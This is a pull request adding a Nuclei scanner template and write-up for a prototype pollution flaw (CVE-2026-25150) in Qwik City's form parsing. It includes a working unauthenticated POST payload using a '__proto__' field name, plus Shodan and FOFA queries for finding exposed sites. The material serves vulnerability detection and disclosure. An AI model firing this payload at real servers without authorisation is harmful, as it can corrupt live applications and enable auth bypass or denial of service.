### PR TITLE
Add CVE-2026-25150: Qwik City Prototype Pollution via FormData Processing

### DIFF
--- a/http/cves/2026/CVE-2026-25150.yaml
+++ b/http/cves/2026/CVE-2026-25150.yaml
@@ -1,0 +1,58 @@
+id: CVE-2026-25150
+
+info:
+  name: Qwik City < 1.19.0 - Prototype Pollution via FormData Processing
+  author: ohmygod20260203
+  severity: critical
+  description: |
+    Qwik City middleware prior to version 1.19.0 contains a prototype pollution vulnerability in the formToObj() function. The function processes form field names with dot notation (e.g., user.name) to create nested objects, but fails to sanitize dangerous property names like __proto__, constructor, and prototype. This allows unauthenticated attackers to pollute Object.prototype by sending crafted HTTP POST requests, potentially leading to privilege escalation, authentication bypass, or denial of service.
+  impact: |
+    An unauthenticated attacker can supply specially crafted form field names that cause formToObj() to write dangerous keys into parsed objects, resulting in prototype pollution of the server process. This can cause privilege escalation, auth bypass, denial-of-service, or other global application integrity failures.
+  remediation: |
+    Upgrade Qwik to version 1.19.0 or later where dangerous property names are properly sanitized in formToObj().
+  reference:
+    - https://github.com/QwikDev/qwik/security/advisories/GHSA-xqg6-98cw-gxhq
+    - https://github.com/QwikDev/qwik/commit/5f65bae2bc33e6ca0c21e4cfcf9eae05077716f7
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25150
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-25150
+    cwe-id: CWE-1321
+    epss-score: 0.04
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"qwik"
+    fofa-query: body="qwik"
+  tags: cve,cve2026,qwik,prototype-pollution,rce,intrusive
+
+http:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        __proto__.polluted=nuclei_prototype_pollution_test
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "nuclei_prototype_pollution_test"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+          - 500
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        group: 0
+        regex:
+          - "nuclei_prototype_pollution_test"


### PR DESCRIPTION
## CVE-2026-25150 — Qwik City < 1.19.0 Prototype Pollution

### Vulnerability
A prototype pollution vulnerability in the `formToObj()` function within `@builder.io/qwik-city` middleware. The function processes form field names with dot notation but fails to sanitize dangerous property names like `__proto__`, `constructor`, and `prototype`.

**CVSS 9.8 (Critical)** — Unauthenticated, Network-accessible

### Attack Vector
```
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded

__proto__.polluted=attacker_value
```

### Impact
- Privilege escalation
- Authentication bypass  
- Denial of service
- Global application integrity failures

### References
- [GHSA-xqg6-98cw-gxhq](https://github.com/QwikDev/qwik/security/advisories/GHSA-xqg6-98cw-gxhq)
- [Fix commit](https://github.com/QwikDev/qwik/commit/5f65bae2bc33e6ca0c21e4cfcf9eae05077716f7)
- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-25150)

### Template Details
- CWE-1321 (Prototype Pollution)
- Detection: POST form data with `__proto__` key, check for reflected value
- Remediation: Upgrade to Qwik >= 1.19.0